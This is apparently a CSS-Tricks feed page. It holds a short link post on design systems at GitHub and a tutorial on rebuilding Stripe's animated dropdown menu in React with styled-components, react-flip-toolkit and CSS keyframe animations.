This whole post had me nodding furiously along to every word but there was one point that I particularly made note of: the part where Diana mentions how her team decided to make “the status of styles more obvious” in order to communicate changes to the rest of the team.

Lately, I’ve noticed how design systems can demonstrate the status of a project, which is super neat. Communicating these large changes to the codebase early and frequently, over-communicating almost, is probably a good idea when a design systems team is just getting started.

Direct Link to ArticlePermalink

The post Design Systems at GitHub appeared first on CSS-Tricks.

Building a Complex UI Animation in React, Simply

Css Tricks - Thu, 07/12/2018 - 3:45am

Let’s use React, styled-components, and react-flip-toolkit to make our own version of the animated navigation menu on the Stripe homepage. It's an impressive menu with some slick animation effects and the combination of these three tools can make it relatively easy to recreate.

This is an intermediate-level walkthrough that assumes familiarity with React and basic animation concepts. Our React guide is a good place to start.

Here's what we're aiming to make:

See the Pen React Stripe Menu by Alex (@aholachek) on CodePen.

View Repo

Breaking down the animation

First, let's break down the animation into different parts so we can more easily reproduce it. You might want to check out the finished product in slow motion (use the toggles) so you can catch all the details.

  1. The white dropdown container updates both its size and position.
  2. The gray background in the bottom half of the dropdown container transitions its height.
  3. As the dropdown container moves, the previous contents fade out and slightly to the opposite direction, as if the dropdown is leaving them behind, while the new contents slide into view.

There are a few useful guiding rules to keep in mind as we embark on reproducing this animation in React. Where possible, let’s keep things simple by having the browser manage layout. We’ll do this by keeping elements in the regular DOM flow instead of using absolute positioning and manual calculation. Rather than having a single dropdown component that we have to relocate every time a user's mouse position changes, we’ll render a single dropdown in the appropriate navbar section.

We’ll use the FLIP technique to create the illusion that the three separate dropdown components are actually a single, moving component.
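For readers unfamiliar with FLIP (First, Last, Invert, Play), here's a minimal vanilla JavaScript sketch of the idea. This is not react-flip-toolkit's actual implementation, just the core technique it builds on:

```javascript
// FLIP: measure the element's position before (First) and after (Last) a
// layout change, apply the inverse transform (Invert), then animate it
// away (Play). computeInvert is pure, so it can be tested in isolation.
function computeInvert(first, last) {
  return {
    x: first.left - last.left,
    y: first.top - last.top,
    scaleX: first.width / last.width,
    scaleY: first.height / last.height
  };
}

function flip(el, first) {
  var last = el.getBoundingClientRect();
  var i = computeInvert(first, last);
  // Invert: jump back to the old position/size without a transition...
  el.style.transition = 'transform 0s';
  el.style.transform =
    'translate(' + i.x + 'px,' + i.y + 'px) scale(' + i.scaleX + ',' + i.scaleY + ')';
  // ...then Play: animate to the natural (identity) transform
  requestAnimationFrame(function () {
    el.style.transition = 'transform 300ms';
    el.style.transform = 'none';
  });
}
```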

Scaffolding out the UI with styled-components

To start with, we'll build an unanimated navbar component that simply takes a configuration object of titles and dropdown components and renders a navbar menu. The component will show and hide the relevant dropdown on mouseover.
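The configuration might look something like this. It's a guess at the shape; the demo's actual config and component names may differ, and plain functions stand in here for the real React dropdown components:

```javascript
// Hypothetical shape of the navbar configuration object; placeholder
// functions stand in for the demo's real dropdown components
const ProductsDropdown = () => 'Products dropdown contents';
const DevelopersDropdown = () => 'Developers dropdown contents';

const navbarConfig = [
  { title: 'Products', dropdown: ProductsDropdown },
  { title: 'Developers', dropdown: DevelopersDropdown }
];
```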

We’ll build the UI components using styled-components. Not only are they a convenient way to build a modular UI, but they have a great API for adding configurable CSS keyframe animations. It turns out CSS animations and React play really nicely together, so we’ll be using CSS keyframes to add many of the animations later on.

With the components assembled without any animations, we’ve created something that looks like this:

See the Pen React Stripe Menu Before Animation by Alex (@aholachek) on CodePen.

Notice that the gray background at the bottom of the menu is missing. It’s the only element that we’re going to have to take out of the regular DOM flow and absolutely position, so we’ll ignore it for now.

Animating our dropdown with the FLIP technique

We’re going to be using the react-flip-toolkit library to help us animate the dropdown’s size and position. This is a library I put together to make advanced and complex transitions easier and configurable.

It provides us with two components: a top-level <Flipper/> component, and a <Flipped/> component to wrap any children we want to animate.

First, let's set up the Flipper wrapper component in the render function of AnimatedNavbar:

// currentIndex is the index of the hovered dropdown
<Flipper flipKey={currentIndex}>
  <Navbar>
    {navbarConfig.map((n, index) => {
      // render navbar items here
    })}
  </Navbar>
</Flipper>

Next, in our DropdownContainer component, we'll wrap the elements that need to be animated in their own Flipped components, making sure to give each a unique flipId prop:

<DropdownRoot>
  <Flipped flipId="dropdown-caret">
    <Caret />
  </Flipped>
  <Flipped flipId="dropdown">
    <DropdownBackground>
      {children}
    </DropdownBackground>
  </Flipped>
</DropdownRoot>

We're animating the <Caret/> component and the <DropdownBackground/> component separately so that the overflow:hidden style on the <DropdownBackground/> component doesn't interfere with the rendering of the <Caret/> component.

Now we’ve got a working FLIP animation, but there’s still one problem: the contents of the dropdown appear weirdly stretched over the course of the animation:

See the Pen React Stripe Menu -- Error #1: no scale adjustment by Alex (@aholachek) on CodePen.

This unwanted effect occurs because scale transforms apply to children. If you apply a scaleY(2) to a div with some text inside, you will be scaling up the text and distorting it as well.
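In numbers: if a parent is scaled by a factor (sx, sy), a child must be counter-scaled by (1/sx, 1/sy) to keep its rendered size unchanged. A tiny hypothetical helper illustrating the math (a simplified model, not the library's actual code):

```javascript
// Simplified model of counter-scaling: the child's scale must be the
// reciprocal of the parent's scale to cancel out the distortion
function inverseScale(parentScale) {
  return {
    scaleX: 1 / parentScale.scaleX,
    scaleY: 1 / parentScale.scaleY
  };
}
```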

We can solve this problem by wrapping the children in a Flipped component with an inverseFlipId that references the parent component's flipId (in this case "dropdown") to request that parent transforms be cancelled out for children. Because we still want translate transforms to affect the children, we also pass the scale prop to limit the cancellation to just scale changes.

<DropdownRoot>
  <Flipped flipId="dropdown-caret">
    <Caret />
  </Flipped>
  <Flipped flipId="dropdown">
    <DropdownBackground>
      <Flipped inverseFlipId="dropdown" scale>
        {children}
      </Flipped>
    </DropdownBackground>
  </Flipped>
</DropdownRoot>

Whew. All that work and we’ve created something that looks like this:

See the Pen React Stripe Menu -- Simple FLIP by Alex (@aholachek) on CodePen.

It’s all in the details

It’s getting closer, but we still have to attend to the small details that make the animation look great: the subtle rotation animation when the dropdown appears and disappears, the cross-fade of previous and current dropdown children, and that silky-smooth gray background height animation.

Configurable CSS keyframe animations with styled components

Styled-components, which we've been using to build up the UI for this demo, offer a super convenient way to create configurable keyframe animations. We'll use this functionality for both the dropdown enter animation and the cross-fade of the contents. We can pass in some basic information about the desired animation — whether the contents are animating in or out, and the direction the user's mouse has moved — and automatically get the appropriate animation applied. Here, for example, is the code for the crossfade animation in the <FadeContents> component:

const getFadeContainerKeyFrame = ({ animatingOut, direction }) => {
  if (!direction) return;
  return keyframes`
    from {
      transform: translateX(${animatingOut ? 0 : direction === "left" ? 20 : -20}px);
    }
    to {
      transform: translateX(${!animatingOut ? 0 : direction === "left" ? -20 : 20}px);
      opacity: ${animatingOut ? 0 : 1};
    }
  `;
};

const FadeContainer = styled.div`
  animation-name: ${getFadeContainerKeyFrame};
  animation-duration: ${props => props.duration * 0.5}ms;
  animation-fill-mode: forwards;
  position: ${props => (props.animatingOut ? "absolute" : "relative")};
  opacity: ${props => (props.direction && !props.animatingOut ? 0 : 1)};
  animation-timing-function: linear;
  top: 0;
  left: 0;
`;

Each time the user hovers a new item, we'll provide not only the current dropdown, but the previous dropdown as children to the DropdownContainer component, along with information about which direction the user's mouse has moved. The DropdownContainer component will then wrap both its children in a new component, FadeContents, that will use the keyframe animation code above to add the appropriate transition.

Here's a link to the full code for the FadeContents component.

The dropdown's enter/exit animation will function very similarly.

The final touch: A fluid background animation

Finally, let’s add the gray background animation. To keep this animation crisp, we need to diverge from our previous strategy of keeping normal DOM nesting and letting the browser handle layout, and perform some manual positioning calculations instead. We'll also need to interact directly with the DOM. In short, it's going to get a little messy.

Here's a visual representation of our basic approach:

See the Pen React Stripe Menu -- Animated Background by Alex (@aholachek) on CodePen.

We’ll absolutely position a gray div at the top of the DropdownContainer. In the componentDidMount lifecycle function of DropdownContainer, we’ll update the translateY transform of the gray background. If the dropdown container component only has a single child (which means the user has only hovered a single dropdown so far), we’ll set the gray div’s translateY to the height of the first dropdown section. If there are two children, including a previous dropdown, we’ll instead set the initial translateY to the height of the previous dropdown’s first section, and then animate the translateY to the height of the current dropdown’s first section. Here's the function that gets called in componentDidMount:

const updateAltBackground = ({ altBackground, prevDropdown, currentDropdown }) => {
  const prevHeight = getFirstDropdownSectionHeight(prevDropdown)
  const currentHeight = getFirstDropdownSectionHeight(currentDropdown)

  // we'll use this function when we want a change
  // to happen immediately, without CSS transitions
  const immediateSetTranslateY = (el, translateY) => {
    el.style.transform = `translateY(${translateY}px)`
    el.style.transition = "transform 0s"
    requestAnimationFrame(() => (el.style.transitionDuration = ""))
  }

  if (prevHeight) {
    // transition the grey ("alt") background from its previous height
    // to its current height
    immediateSetTranslateY(altBackground, prevHeight)
    requestAnimationFrame(() => {
      altBackground.style.transform = `translateY(${currentHeight}px)`
    })
  } else {
    // immediately set the background to the appropriate height
    // since we don't have a stored value
    immediateSetTranslateY(altBackground, currentHeight)
  }
}

This approach requires DropdownContainer to use a ref and reach inside its children to take DOM measurements in the getFirstDropdownSectionHeight function, which feels sloppy. If you have any ideas for alternative implementations, please let me know in the comments!

Wrapping up

Hopefully this article has helped clarify some techniques you can use the next time you build an animation in React. There are normally multiple ways of achieving any effect, but often it makes sense to start with the simplest possible implementation — basic components with some CSS transitions or keyframe animations — and scale up the complexity from there when necessary. In our case, that meant including an additional library, react-flip-toolkit, so we didn't have to worry about manually transitioning the position of the dropdown component across the screen. To fully recreate the animation, we did have to write a fair amount of code. But by breaking down this animation into separate parts and tackling them one-by-one, we managed to replicate a pretty cool UI effect in React.

The post Building a Complex UI Animation in React, Simply appeared first on CSS-Tricks.
